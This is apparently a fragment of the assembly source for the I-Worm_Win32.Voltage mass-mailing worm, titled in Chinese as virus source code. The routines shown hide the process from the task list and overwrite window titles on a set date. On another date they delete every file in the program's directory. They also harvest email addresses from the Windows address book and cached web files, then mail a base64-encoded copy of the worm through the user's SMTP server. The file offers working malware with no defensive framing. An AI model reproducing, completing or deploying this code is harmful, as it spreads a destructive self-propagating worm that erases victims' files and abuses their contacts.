i-worm_win32.voltage病毒源代码.txt

I-Worm_Win32.Voltage病毒源代码

EndRarHeader:
RarHeaderSize equ ($-RarHeader) 


;(c) z0mbie/29a crc32 function
; input:　EDX=data, ECX=size, EAX=crc
; output: EAX=crc, EDX+=ECX, ECX=BL=0
xcrc32: jecxz　 @@4 
not　　 eax
@@1: xor　　 al, [edx]
inc　　 edx
mov　　 bl, 8
@@2: shr　　 eax, 1
jnc　　 @@3
xor　　 eax, 0EDB88320h
@@3: dec　　 bl
jnz　　 @@2
loop　　@@1
not　　 eax
@@4: ret



HideVirus: ;hide virus process from alt+crtl+del menu
lea eax,[ebp + RSP]
push eax
push dword ptr [ebp + kernel32base]
call [ebp + __GetProcAddress]
cmp eax,0h
je ExitRSP
push 1
push 0
call eax
ExitRSP:ret

RSP db "RegisterServiceProcess",0



PayLoad:
lea eax,[ebp + SYSTEMTIME]
push eax
call [ebp + GetLocalTime]
cmp word ptr [ebp + wMonth],0ch
jne ExitPayload
cmp word ptr [ebp + wDay],1eh
jne Payload2
;replace all windows title with copyright message
mov ecx,0ffffh
payl0ad:push ecx
lea eax,[ebp + CopyRight]
push eax
push ecx
call [ebp + SetWindowText]
pop ecx
loop payl0ad
;show payload message box:
push MB_SYSTEMMODAL or MB_ICONINFORMATION
lea eax,[ebp + CopyRight]
push eax
push eax
push 0h
call [ebp + MessageBox]
Payload2:
;fuck ppl data
cmp word ptr [ebp + wDay],1dh
jne ExitPayload
lea eax,[ebp + FileDirectory]
push eax
call [ebp + SetCurrentDirectory] ;goto running program directory
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + search_mask]
push eax
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitPayload
mov [ebp + hfind],eax ;save search handle
@Love:
IF DEBUG
push MB_YESNO
lea eax,[ebp + warning2]
push eax
lea eax,[ebp + cFileName]
push eax
push 0h
call [ebp + MessageBox]
cmp eax,IDYES
jne SkipFile
ENDIF
lea eax,[ebp + cFileName]
push eax
call [ebp + DeleteFile]
SkipFile:
IF DEBUG
push MB_YESNO
lea eax,[ebp + StopPayload]
push eax
lea eax,[ebp + cFileName]
push eax
push 0h
call [ebp + MessageBox]
cmp eax,IDYES
je ExitPayload
ENDIF
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
cmp eax,0h
jne @Love
ExitPayload:
ret

MB_SYSTEMMODAL equ 00001000h
MB_ICONINFORMATION equ 00000040h

IF DEBUG
warning2 db "Voltage Virus is going to delete this file :",0
StopPayload db "Stop Payload ?",0
ENDIF

hfind dd 0
search_mask db "*.*",0


WIN32_FIND_DATA:
dwFileAttributes dd 0
ftCreationTime dq 0
ftLastAccessTime dq 0
ftLastWriteTime dq 0
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd　　　0
dwReserved1 dd　　　0
cFileName db　　　0ffh dup (0)
cAlternateFileName db 14 dup (0)



GetADVAPI32Apis:
lea eax,[ebp + ADVAPI32dll]
push eax
call [ebp + LoadLibrary]
xchg eax,edx
mov ecx,NumberOfRegFunctions
lea eax,[ebp + reg_functions_sz]
lea ebx,[ebp + reg_function_addresses]
call get_apis
ret

ADVAPI32dll db "ADVAPI32.DLL",0

reg_functions_sz:

_RegOpenKeyExA db "RegOpenKeyExA",0
_RegSetValueExA db "RegSetValueExA",0
_RegCloseKey db "RegCloseKey",0
_RegQueryValueEx db "RegQueryValueExA",0

reg_function_addresses:

RegOpenKeyEx dd 0
RegSetValueEx dd 0
RegCloseKey dd 0
RegQueryValueEx dd 0

NumberOfRegFunctions equ 4



MassMail:
;send the virus to all email addresses that the virus
;found in the Windows address book file.and temporary
;internet files
pushad ;set SEH
lea eax,[ebp + MM_SEH_Handler]
push eax
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
call CheckConditions ;check for some conditions before sending mails
jnc ExitMM
call AllowOnlyOneRun ;use mutex to alow only one execute of the mail
jnc ExitMM ;worm
call GetWinsockApis ;get all needed apis from winsock library 
jnc ExitMM
call GetSMTPServer ;get the default smtp server from the registry
jnc FreeWSLibraryAndExit
call CreateVirusBase64Image ;base64 encode of infected file
jnc FreeWSLibraryAndExit
call ScanWAB ;get email addresses from the windows address book
call SearchEmailsInHTMFiles ;and also from temporary internet files
call ConnectToServer ;connect to server
jnc FreeBase64Mem
call [ebp + GetTickCount]
mov [ebp + MessageNumber],al ;select random message
call __recv ;recv server message:
cmp eax,SOCKET_ERR
je Disconnect
cmp eax,0h
je Disconnect
lea eax,[ebp + GetBuffer]
cmp dword ptr [eax]," 022" ;is 220 ?
jne Disconnect
;send HELO command:
push 0h
push SizeOfHELO
lea eax,[ebp + HELO]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
cmp eax,SOCKET_ERR
je Disconnect
call __recv ;get server message
cmp eax,SOCKET_ERR
je Disconnect
cmp eax,0h
je Disconnect
lea eax,[ebp + GetBuffer]
cmp dword ptr [eax]," 052" ;is 250 ?
jne Disconnect
;send the mail from command:
push 0h
cmp byte ptr [ebp + MessageNumber],32h
ja mfrom
push SizeOfMailFrom1
lea eax,[ebp + MAILFROM1]
push eax
jmp mfromok
mfrom: cmp byte ptr [ebp + MessageNumber],64h
ja mfrom2
push SizeOfMailFrom2
lea eax,[ebp + MAILFROM2]
push eax
jmp mfromok
mfrom2: cmp byte ptr [ebp + MessageNumber],96h
ja mfrom3
push SizeOfMailFrom3
lea eax,[ebp + MAILFROM3]
push eax
jmp mfromok
mfrom3: cmp byte ptr [ebp + MessageNumber],0c8h
ja mfrom4
push SizeOfMailFrom4
lea eax,[ebp + MAILFROM4]
push eax
jmp mfromok
mfrom4: push SizeOfMailFrom5
lea eax,[ebp + MAILFROM5]
push eax
mfromok:push dword ptr [ebp + vsocket]
call [ebp + send]
cmp eax,SOCKET_ERR
je Disconnect
call __recv ;get server message:
cmp eax,SOCKET_ERR
je Disconnect
cmp eax,0h
je Disconnect
lea eax,[ebp + GetBuffer]
cmp dword ptr [eax]," 052" ;is 250 ?
jne Disconnect
;send RCPT command
xor ecx,ecx
mov esi,[ebp + hMailAddresses]
mov cx,[ebp + NumberOfMailAddresses]
cmp ecx,1h
jbe MailsFromFiles
@NxtAdd:push ecx
push 0h
push SizeOfRcpt
lea edx,[ebp + RCPT]
push edx
push dword ptr [ebp + vsocket]
call [ebp + send] ;send start of RCPT command
push esi
xor ecx,ecx
AddSize:inc ecx ;get email address size
inc esi
cmp byte ptr [esi],0h
jne AddSize 
pop esi ;pointer to email addresses array
push 0h
push ecx
push esi
add esi,ecx ;move to next address
inc esi
push dword ptr [ebp + vsocket]
call [ebp + send] ;send address
push 0h
push SizeOfEndRcpt
lea eax,[ebp + EndOfRCPT]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send] ;send the end or rcpt command
call __recv ;get server message
pop ecx
loop @NxtAdd ;and move to next mail address
MailsFromFiles: ;send mails to ppl that we found in temporary internet files
cmp word ptr [ebp + NumberOfEmails],28h
jb _1___ ;is number of mails > 40 ?
mov [ebp + NumberOfEmails],1eh ;send 30 emails
_1___: xor ecx,ecx
mov cx,[ebp + NumberOfEmails] ;number of mails
mov esi,[ebp + MailsMemory] ;pointer to mails array
@nM: push ecx ;next mail
push 0h
push SizeOfRcpt
lea edx,[ebp + RCPT]
push edx
push dword ptr [ebp + vsocket]
call [ebp + send] ;send start of RCPT command
xor ecx,ecx
push esi
Csize: inc ecx
inc esi
cmp byte ptr [esi],0h
jne Csize ;calc mail address size
pop esi ;restore pointer to mail address
push 0h
push ecx
push esi
add esi,ecx
inc esi ;move to next email
push dword ptr [ebp + vsocket]
call [ebp + send]
push 0h
push SizeOfEndRcpt
lea eax,[ebp + EndOfRCPT]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
call __recv
pop ecx
loop @nM
;send data command
push 0h
push SizeOfData
lea eax,[ebp　+ __DATA]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
cmp eax,SOCKET_ERR
je Disconnect
;get server message
call __recv
cmp eax,SOCKET_ERR
je Disconnect
cmp eax,0h
je Disconnect
lea eax,[ebp + GetBuffer]
cmp dword ptr [eax]," 453" ;is 354 ?
jne Disconnect
;send from and subject
push 0h
cmp byte ptr [ebp + MessageNumber],32h
ja _fs
push SizeOfFromAndSubject1
lea eax,[ebp + FromAndSubject1]
push eax
jmp smimeh 
_fs: cmp byte ptr [ebp + MessageNumber],64h
ja _fs2
push SizeOfFromAndSubject2
lea eax,[ebp + FromAndSubject2]
push eax
jmp smimeh 
_fs2: cmp byte ptr [ebp + MessageNumber],96h
ja _fs3
push SizeOfFromAndSubject3
lea eax,[ebp + FromAndSubject3]
push eax
jmp smimeh
_fs3: cmp byte ptr [ebp + MessageNumber],0c8h
ja _fs4
push SizeOfFromAndSubject4
lea eax,[ebp + FromAndSubject4]
push eax
jmp smimeh
_fs4: push SizeOfFromAndSubject5
lea eax,[ebp + FromAndSubject5]
push eax
smimeh: push dword ptr [ebp + vsocket]
call [ebp + send]
;send the mime header
push 0h
push SizeOfMessageMimeHeader
lea eax,[ebp + MessageMimeHeader]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
cmp eax,SOCKET_ERR
je Disconnect
;send message and attachment name
push 0h
cmp byte ptr [ebp + MessageNumber],32h
ja _ma
push SizeOfMessageAndFileName1
lea eax,[ebp + MessageAndFileName1]
push eax
jmp sattch 
_ma: cmp byte ptr [ebp + MessageNumber],64h
ja _ma2
push SizeOfMessageAndFileName2
lea eax,[ebp + MessageAndFileName2]
push eax
jmp sattch
_ma2: cmp byte ptr [ebp + MessageNumber],96h
ja _ma3
push SizeOfMessageAndFileName3
lea eax,[ebp + MessageAndFileName3]
push eax
jmp sattch
_ma3: cmp byte ptr [ebp + MessageNumber],0c8h
ja _ma4
push SizeOfMessageAndFileName4
lea eax,[ebp + MessageAndFileName4]
push eax
jmp sattch
_ma4: push SizeOfMessageAndFileName5
lea eax,[ebp + MessageAndFileName5]
push eax
sattch: push dword ptr [ebp + vsocket]
call [ebp + send]
;send the attachment
mov ecx,[ebp + sizeofbase64out]
mov eax,[ebp + base64outputmem]
push 0h
push ecx
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
;send end of mail
push 0h
push SizeOfEndOfMail
lea eax,[ebp + EndOfMail]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
;get server message
call __recv
;send quit command
QuitM: push 0h
push SizeOfQuit
lea eax,[ebp + QUIT]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
Disconnect: 
push dword ptr [ebp + vsocket]
call [ebp + closesocket]
call [ebp + WSACleanup]
FreeBase64Mem:
push [ebp + base64outputmem]
call [ebp + GlobalFree]
FreeWSLibraryAndExit:
push dword ptr [ebp + hWinsock]
call [ebp + FreeLibrary]
FreeWabMemAndExit:
push dword ptr [ebp + hMailAddresses]
call [ebp + GlobalFree]
push dword ptr [ebp + MailsMemory]
call [ebp + GlobalFree]
ExitMM: pop dword ptr fs:[0]
add esp,4h
popad
ret
MM_SEH_Handler:
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,4h
popad
ret


MessageNumber db 0


AllowOnlyOneRun:
;use mutex to check if we already running
lea eax,[ebp + CopyRight]
push eax
push 0h
push MUTEX_ALL_ACCESS
call [ebp + OpenMutex]
cmp eax,0h
jne AlreadyRun
lea eax,[ebp + CopyRight]
push eax
xor eax,eax
push eax
push eax
call [ebp + CreateMutex]
stc
ret
AlreadyRun:
clc
ret

MUTEX_ALL_ACCESS equ 001F0001h


__recv:
push 0h
push 0ffh
lea eax,[ebp + GetBuffer]
push eax
push dword ptr [ebp + vsocket]
call [ebp + recv]
ret


;scan all .htm,asp,xml temporary files for email addresses
SearchEmailsInHTMFiles:
IF DEBUG
call SetDebugDir
db "C:\w32_Voltage_V2\TempInetFiles",0
SetDebugDir:
call [ebp + SetCurrentDirectory]
jmp ____1_
ENDIF
lea eax,[ebp + shell_dll]
push eax
call [ebp + LoadLibrary]
cmp eax,0h
je ExitTMS
mov [ebp + shell_h],eax
lea ebx,[ebp + _SHGetSpecialFolderPath]
push ebx
push eax
call [ebp + __GetProcAddress]
cmp eax,0h
je UnloadSh
xor ecx,ecx
push ecx
push CSIDL_INTERNET_CACHE ;get temporary internet files directory
lea ebx,[ebp + TempDir]
push ebx
push ecx
call eax
cmp eax,1h ;success ?
jne UnloadSh 
lea eax,[ebp + TempDir]
push eax
call [ebp + SetCurrentDirectory]
____1_: push 0c800h ;50k
push GPTR
call [ebp + GlobalAlloc] ;allocate 50k of memory which used to store mails
cmp eax,0h
je UnloadSh
mov [ebp + MailsMemory],eax
mov [ebp + LastMailPointer],0
mov [ebp + NumberOfEmails],0
mov [ebp + NewMail],0h
call FindFiles
UnloadSh: ;unload shell library
push dword ptr [ebp + shell_h]
call [ebp + FreeLibrary]
ExitTMS:ret ;exit temp mails search


shell_dll db "Shell32.dll",0
shell_h dd 0
_SHGetSpecialFolderPath db "SHGetSpecialFolderPathA",0


CSIDL_INTERNET_CACHE equ 0020h

MailsMemory dd 0